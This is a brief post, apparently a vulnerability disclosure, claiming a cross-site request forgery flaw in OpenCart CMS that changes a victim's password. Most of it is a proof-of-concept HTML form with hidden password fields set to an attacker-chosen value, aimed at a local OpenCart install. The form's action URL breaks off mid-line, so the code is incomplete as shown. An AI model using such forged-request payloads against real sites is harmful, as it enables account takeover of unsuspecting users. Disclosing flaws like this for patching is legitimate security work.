I found CSRF in Open Cart CMS. Through this you can update victim's password.
Here is html form code
<form name="test" action="http://127.0.0.1/upload/index.php?
<input name="password" value="w3bdrill3r" type="hidden">
<input name="confirm" value="w3bdrill3r" type="hidden">
<input value="Submit" type="submit">